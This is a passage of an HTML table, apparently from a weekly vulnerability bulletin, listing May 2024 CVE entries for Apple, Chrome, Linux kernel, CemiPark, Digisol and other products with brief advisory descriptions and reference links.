<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27834" target="_blank">CVE-2024-27834</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214102" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214103" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214104" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>This issue was addressed through improved state management. This issue is fixed in iOS 17.5 and iPadOS 17.5. An attacker with physical access to an iOS device may be able to access notes from the lock screen.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27835" target="_blank">CVE-2024-27835</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>A privacy issue was addressed by moving sensitive data to a more secure location. This issue is fixed in iOS 17.5 and iPadOS 17.5. A malicious application may be able to determine a user's current location.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27839" target="_blank">CVE-2024-27839</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>The issue was addressed with improved memory handling. This issue is fixed in iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. An app may be able to disclose kernel memory.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27841" target="_blank">CVE-2024-27841</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>This issue was addressed with improved checks This issue is fixed in iOS 17.5 and iPadOS 17.5, macOS Sonoma 14.5. An app may be able to bypass Privacy preferences.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27847" target="_blank">CVE-2024-27847</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iOS and iPadOS<br> </td>
<td>A privacy issue was addressed with improved client ID handling for alternative app marketplaces. This issue is fixed in iOS 17.5 and iPadOS 17.5. A maliciously crafted webpage may be able to distribute a script that tracks users on other webpages.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27852" target="_blank">CVE-2024-27852</a><br><a href="https://support.apple.com/en-us/HT214101" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--iTunes for Windows<br> </td>
<td>The issue was addressed with improved checks. This issue is fixed in iTunes 12.13.2 for Windows. Parsing a file may lead to an unexpected app termination or arbitrary code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27793" target="_blank">CVE-2024-27793</a><br><a href="https://support.apple.com/en-us/HT214099" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--macOS<br> </td>
<td>This issue was addressed with improved redaction of sensitive information. This issue is fixed in macOS Monterey 12.7.5, macOS Ventura 13.6.5, macOS Sonoma 14.4. A malicious application may be able to access Find My data.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-23229" target="_blank">CVE-2024-23229</a><br><a href="https://support.apple.com/en-us/HT214084" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214085" target="_blank">product-security@apple.com</a><br><a href="https://support.apple.com/en-us/HT214105" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--macOS<br> </td>
<td>A correctness issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.5. An app may be able to read arbitrary files.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-23236" target="_blank">CVE-2024-23236</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--macOS<br> </td>
<td>An authorization issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14.5. An attacker may be able to elevate privileges.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27798" target="_blank">CVE-2024-27798</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--macOS<br> </td>
<td>The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.5. An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27813" target="_blank">CVE-2024-27813</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--macOS<br> </td>
<td>A logic issue was addressed with improved restrictions. This issue is fixed in macOS Sonoma 14.5. An app may be able to gain root privileges.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27822" target="_blank">CVE-2024-27822</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--macOS<br> </td>
<td>This issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sonoma 14.5. An app may be able to elevate privileges.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27824" target="_blank">CVE-2024-27824</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--macOS<br> </td>
<td>A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sonoma 14.5. An app may be able to bypass certain Privacy preferences.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27825" target="_blank">CVE-2024-27825</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--macOS<br> </td>
<td>This issue was addressed through improved state management. This issue is fixed in macOS Sonoma 14.5. An app may be able to read arbitrary files.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27827" target="_blank">CVE-2024-27827</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--macOS<br> </td>
<td>The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.5. Processing a file may lead to unexpected app termination or arbitrary code execution.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27829" target="_blank">CVE-2024-27829</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--macOS<br> </td>
<td>A downgrade issue was addressed with additional code-signing restrictions. This issue is fixed in macOS Sonoma 14.5. A local attacker may gain access to Keychain items.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27837" target="_blank">CVE-2024-27837</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--macOS<br> </td>
<td>The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.5. An app may be able to execute arbitrary code with kernel privileges.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27842" target="_blank">CVE-2024-27842</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Apple--macOS<br> </td>
<td>A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.5. An app may be able to elevate privileges.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27843" target="_blank">CVE-2024-27843</a><br><a href="https://support.apple.com/en-us/HT214106" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>CEMI Tomasz Paweek--CemiPark<br> </td>
<td>The access control in CemiPark software does not properly validate user-entered data, which allows the authentication bypass. An attacker who has network access to the login panel can log in with administrator rights to the application.This issue affects CemiPark software: 4.5, 4.7, 5.03 and potentially others. The vendor refused to provide the specific range of affected products.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4423" target="_blank">CVE-2024-4423</a><br><a href="http://cemi.pl/" target="_blank">cvd@cert.pl</a><br><a href="https://cert.pl/en/posts/2024/05/CVE-2024-4423/" target="_blank">cvd@cert.pl</a><br><a href="https://cert.pl/posts/2024/05/CVE-2024-4423/" target="_blank">cvd@cert.pl</a></td>
</tr>
<tr>
<td>CEMI Tomasz Paweek--CemiPark<br> </td>
<td>The access control in CemiPark software does not properly validate user-entered data, which allows the stored cross-site scripting (XSS) attack. The parameters used to enter data into the system do not have appropriate validation, which makes possible to smuggle in HTML/JavaScript code. This code will be executed in the user's browser space.This issue affects CemiPark software: 4.5, 4.7, 5.03 and potentially others. The vendor refused to provide the specific range of affected products.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4424" target="_blank">CVE-2024-4424</a><br><a href="http://cemi.pl/" target="_blank">cvd@cert.pl</a><br><a href="https://cert.pl/en/posts/2024/05/CVE-2024-4423/" target="_blank">cvd@cert.pl</a><br><a href="https://cert.pl/posts/2024/05/CVE-2024-4423/" target="_blank">cvd@cert.pl</a></td>
</tr>
<tr>
<td>CEMI Tomasz Paweek--CemiPark<br> </td>
<td>The access control in CemiPark software stores integration (e.g. FTP or SIP) credentials in plain-text. An attacker who gained unauthorized access to the device can retrieve clear text passwords used by the system.This issue affects CemiPark software: 4.5, 4.7, 5.03 and potentially others. The vendor refused to provide the specific range of affected products.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4425" target="_blank">CVE-2024-4425</a><br><a href="http://cemi.pl/" target="_blank">cvd@cert.pl</a><br><a href="https://cert.pl/en/posts/2024/05/CVE-2024-4423/" target="_blank">cvd@cert.pl</a><br><a href="https://cert.pl/posts/2024/05/CVE-2024-4423/" target="_blank">cvd@cert.pl</a></td>
</tr>
<tr>
<td>Claris--FileMaker Server<br> </td>
<td>Claris International has successfully resolved an issue of potentially exposing password information to front-end websites when signed in to the Admin Console with an administrator role. This issue has been fixed in FileMaker Server 20.3.1 by eliminating the send of Admin Role passwords in the Node.js socket.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-42955" target="_blank">CVE-2023-42955</a><br><a href="https://support.claris.com/s/article/Administrator-role-passwords-being-exposed-when-logged-into-the-Admin-Console?language=en_US" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Claris--FileMaker Server<br> </td>
<td>Claris International has resolved an issue of potentially allowing unauthorized access to records stored in databases hosted on FileMaker Server. This issue has been fixed in FileMaker Server 20.3.2 by validating transactions before replying to client requests.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27790" target="_blank">CVE-2024-27790</a><br><a href="https://support.claris.com/s/answerview?anum=000041674&amp;language=en_US" target="_blank">product-security@apple.com</a></td>
</tr>
<tr>
<td>Devolutions--Server<br> </td>
<td>Improper input validation in PAM JIT elevation feature in Devolutions Server 2024.1.11.0 and earlier allows an authenticated user with access to the PAM JIT elevation feature to manipulate the LDAP filter query via a specially crafted request.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-5072" target="_blank">CVE-2024-5072</a><br><a href="https://devolutions.net/security/advisories/DEVO-2024-0007" target="_blank">security@devolutions.net</a></td>
</tr>
<tr>
<td>Digisol--Digisol Router DG-GR1321<br> </td>
<td>This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to improper implementation of password policies. An attacker with physical access could exploit this by creating password that do not adhere to the defined security standards/policy on the vulnerable system. Successful exploitation of this vulnerability could allow the attacker to expose the router to potential security threats.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-2257" target="_blank">CVE-2024-2257</a><br><a href="https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&amp;VLCODE=CIVN-2024-0158" target="_blank">vdisclose@cert-in.org.in</a></td>
</tr>
<tr>
<td>Digisol--Digisol Router DG-GR1321<br> </td>
<td>This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to presence of root terminal access on a serial interface without proper access control. An attacker with physical access could exploit this by identifying UART pins and accessing the root shell on the vulnerable system. Successful exploitation of this vulnerability could allow the attacker to access the sensitive information on the targeted system.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4231" target="_blank">CVE-2024-4231</a><br><a href="https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&amp;VLCODE=CIVN-2024-0158" target="_blank">vdisclose@cert-in.org.in</a></td>
</tr>
<tr>
<td>Digisol--Digisol Router DG-GR1321<br> </td>
<td>This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to presence of root terminal access on a serial interface without proper access control. An attacker with physical access could exploit this by identifying UART pins and accessing the root shell on the vulnerable system. Successful exploitation of this vulnerability could allow the attacker to access the sensitive information on the targeted system.This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version : v3.2.02) due to lack of encryption or hashing in storing of passwords within the router's firmware/ database. An attacker with physical access could exploit this by extracting the firmware and reverse engineer the binary data to access the plaintext passwords on the vulnerable system. Successful exploitation of this vulnerability could allow the attacker to gain unauthorized access to the targeted system.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4232" target="_blank">CVE-2024-4232</a><br><a href="https://www.cert-in.org.in/s2cMainServlet?pageid=PUBVLNOTES01&amp;VLCODE=CIVN-2024-0158" target="_blank">vdisclose@cert-in.org.in</a></td>
</tr>
<tr>
<td>Google--Chrome<br> </td>
<td>Out of bounds write in V8 in Google Chrome prior to 124.0.6367.207 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4761" target="_blank">CVE-2024-4761</a><br><a href="https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_13.html" target="_blank">chrome-cve-admin@google.com</a><br><a href="https://issues.chromium.org/issues/339458194" target="_blank">chrome-cve-admin@google.com</a></td>
</tr>
<tr>
<td>Google--Chrome<br> </td>
<td>Type Confusion in V8 in Google Chrome prior to 125.0.6422.60 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4947" target="_blank">CVE-2024-4947</a><br><a href="https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html" target="_blank">chrome-cve-admin@google.com</a><br><a href="https://issues.chromium.org/issues/340221135" target="_blank">chrome-cve-admin@google.com</a></td>
</tr>
<tr>
<td>Google--Chrome<br> </td>
<td>Use after free in Dawn in Google Chrome prior to 125.0.6422.60 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4948" target="_blank">CVE-2024-4948</a><br><a href="https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html" target="_blank">chrome-cve-admin@google.com</a><br><a href="https://issues.chromium.org/issues/333414294" target="_blank">chrome-cve-admin@google.com</a></td>
</tr>
<tr>
<td>Google--Chrome<br> </td>
<td>Use after free in V8 in Google Chrome prior to 125.0.6422.60 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4949" target="_blank">CVE-2024-4949</a><br><a href="https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html" target="_blank">chrome-cve-admin@google.com</a><br><a href="https://issues.chromium.org/issues/326607001" target="_blank">chrome-cve-admin@google.com</a></td>
</tr>
<tr>
<td>Google--Chrome<br> </td>
<td>Inappropriate implementation in Downloads in Google Chrome prior to 125.0.6422.60 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)</td>
<td>2024-05-15</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4950" target="_blank">CVE-2024-4950</a><br><a href="https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html" target="_blank">chrome-cve-admin@google.com</a><br><a href="https://issues.chromium.org/issues/40065403" target="_blank">chrome-cve-admin@google.com</a></td>
</tr>
<tr>
<td>HP Inc.--Plantronics Hub<br> </td>
<td>A privilege escalation exists in the updater for Plantronics Hub 3.25.1 and below.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27460" target="_blank">CVE-2024-27460</a><br><a href="https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895" target="_blank">hp-security-alert@hp.com</a></td>
</tr>
<tr>
<td>Ligowave--UNITY<br> </td>
<td>A vulnerability in the web-based management interface of multiple Ligowave devices could allow an authenticated remote attacker to execute arbitrary commands with elevated privileges.This issue affects UNITY: through 6.95-2; PRO: through 6.95-1.Rt3883; MIMO: through 6.95-1.Rt2880; APC Propeller: through 2-5.95-4.Rt3352.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4999" target="_blank">CVE-2024-4999</a><br><a href="https://onekey.com/blog/security-advisory-remote-code-execution-in-ligowave-devices/" target="_blank">research@onekey.com</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: io_uring/af_unix: disable sending io_uring over sockets File reference cycles have caused lots of problems for io_uring in the past, and it still doesn't work exactly right and races with unix_stream_read_generic(). The safest fix would be to completely disallow sending io_uring files via sockets via SCM_RIGHT, so there are no possible cycles invloving registered files and thus rendering SCM accounting on the io_uring side unnecessary.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52654" target="_blank">CVE-2023-52654</a><br><a href="https://git.kernel.org/stable/c/18824f592aad4124d79751bbc1500ea86ac3ff29" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3fe1ea5f921bf5b71cbfdc4469fb96c05936610e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/5a33d385eb36991a91e3dddb189d8679e2aac2be" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/705318a99a138c29a512a72c3e0043b3cd7f55f4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/bcedd497b3b4a0be56f3adf7c7542720eced0792" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/f2f57f51b53be153a522300454ddb3887722fb2c" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: usb: aqc111: check packet for fixup for true limit If a device sends a packet that is inbetween 0 and sizeof(u64) the value passed to skb_trim() as length will wrap around ending up as some very large value. The driver will then proceed to parse the header located at that position, which will either oops or process some random value. The fix is to check against sizeof(u64) rather than 0, which the driver currently does. The issue exists since the introduction of the driver.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52655" target="_blank">CVE-2023-52655</a><br><a href="https://git.kernel.org/stable/c/2ebf775f0541ae0d474836fa0cf3220e502f8e3e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/46412b2fb1f9cc895d6d4036bf24f640b5d86dab" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/82c386d73689a45d5ee8c1290827bce64056dddd" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/84f2e5b3e70f08fce3cb1ff73414631c5e490204" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ccab434e674ca95d483788b1895a70c21b7f016a" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d69581c17608d81824dd497d9a54b6a5b6139975" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: io_uring: drop any code related to SCM_RIGHTS This is dead code after we dropped support for passing io_uring fds over SCM_RIGHTS, get rid of it.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52656" target="_blank">CVE-2023-52656</a><br><a href="https://git.kernel.org/stable/c/6e5e6d274956305f1fc0340522b38f5f5be74bdb" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/88c49d9c896143cdc0f77197c4dcf24140375e89" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a3812a47a32022ca76bf46ddacdd823dc2aabf8b" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/a6771f343af90a25f3a14911634562bb5621df02" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/cfb24022bb2c31f1f555dc6bc3cc5e2547446fb3" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/d909d381c3152393421403be4b6435f17a2378b4" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: Revert "drm/amd/pm: resolve reboot exception for si oland" This reverts commit e490d60a2f76bff636c68ce4fe34c1b6c34bbd86. This causes hangs on SI when DC is enabled and errors on driver reboot and power off cycles.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52657" target="_blank">CVE-2023-52657</a><br><a href="https://git.kernel.org/stable/c/2e443ed55fe3ffb08327b331a9f45e9382413c94" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/955558030954b9637b41c97b730f9b38c92ac488" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/baac292852c0e347626fb5436916947188e5838f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/c51468ac328d3922747be55507c117e47da813e6" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: Revert "net/mlx5: Block entering switchdev mode with ns inconsistency" This reverts commit 662404b24a4c4d839839ed25e3097571f5938b9b. The revert is required due to the suspicion it is not good for anything and cause crash.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52658" target="_blank">CVE-2023-52658</a><br><a href="https://git.kernel.org/stable/c/1bcdd66d33edb446903132456c948f0b764ef2f9" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/3fba8eab2cfc7334e0f132d29dfd2552f2f2a579" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8deeefb24786ea7950b37bde4516b286c877db00" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: x86/mm: Ensure input to pfn_to_kaddr() is treated as a 64-bit type On 64-bit platforms, the pfn_to_kaddr() macro requires that the input value is 64 bits in order to ensure that valid address bits don't get lost when shifting that input by PAGE_SHIFT to calculate the physical address to provide a virtual address for. One such example is in pvalidate_pages() (used by SEV-SNP guests), where the GFN in the struct used for page-state change requests is a 40-bit bit-field, so attempts to pass this GFN field directly into pfn_to_kaddr() ends up causing guest crashes when dealing with addresses above the 1TB range due to the above. Fix this issue with SEV-SNP guests, as well as any similar cases that might cause issues in current/future code, by using an inline function, instead of a macro, so that the input is implicitly cast to the expected 64-bit input type prior to performing the shift operation. While it might be argued that the issue is on the caller side, other archs/macros have taken similar approaches to deal with instances like this, such as ARM explicitly casting the input to phys_addr_t: e48866647b48 ("ARM: 8396/1: use phys_addr_t in pfn_to_kaddr()") A C inline function is even better though. [ mingo: Refined the changelog some more &amp; added __always_inline. ]</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52659" target="_blank">CVE-2023-52659</a><br><a href="https://git.kernel.org/stable/c/325956b0173f11e98f90462be4829a8b8b0682ce" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/7e1471888a5e6e846e9b4d306e5327db2b58e64e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/814305b5c23cb815ada68d43019f39050472b25f" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/8e5647a723c49d73b9f108a8bb38e8c29d3948ea" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: media: rkisp1: Fix IRQ handling due to shared interrupts The driver requests the interrupts as IRQF_SHARED, so the interrupt handlers can be called at any time. If such a call happens while the ISP is powered down, the SoC will hang as the driver tries to access the ISP registers. This can be reproduced even without the platform sharing the IRQ line: Enable CONFIG_DEBUG_SHIRQ and unload the driver, and the board will hang. Fix this by adding a new field, 'irqs_enabled', which is used to bail out from the interrupt handler when the ISP is not operational.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-52660" target="_blank">CVE-2023-52660</a><br><a href="https://git.kernel.org/stable/c/abd34206f396d3ae50cddbd5aa840b8cd7f68c63" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/b39b4d207d4f236a74e20d291f6356f2231fd9ee" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/edcf92bc66d8361c51dff953a55210e5cfd95587" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a><br><a href="https://git.kernel.org/stable/c/ffb635bb398fc07cb38f8a7b4a82cbe5f412f08e" target="_blank">416baaa9-dc9f-4396-8d5f-8c081fb06d67</a></td>
</tr>
<tr>
<td>Linux--Linux<br> </td>
<td>In the Linux kernel, the following vulnerability has been resolved: drm/tegra: rgb: Fix missing clk_put() in the error handling paths of tegra_dc_rgb_probe() If clk_get_sys(..., "pll_d2_out0") fails, the clk_get_sys() call must be undone. Add the missing clk_put and a new 'put_pll_d_out0' label in the error handling path, and use it.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
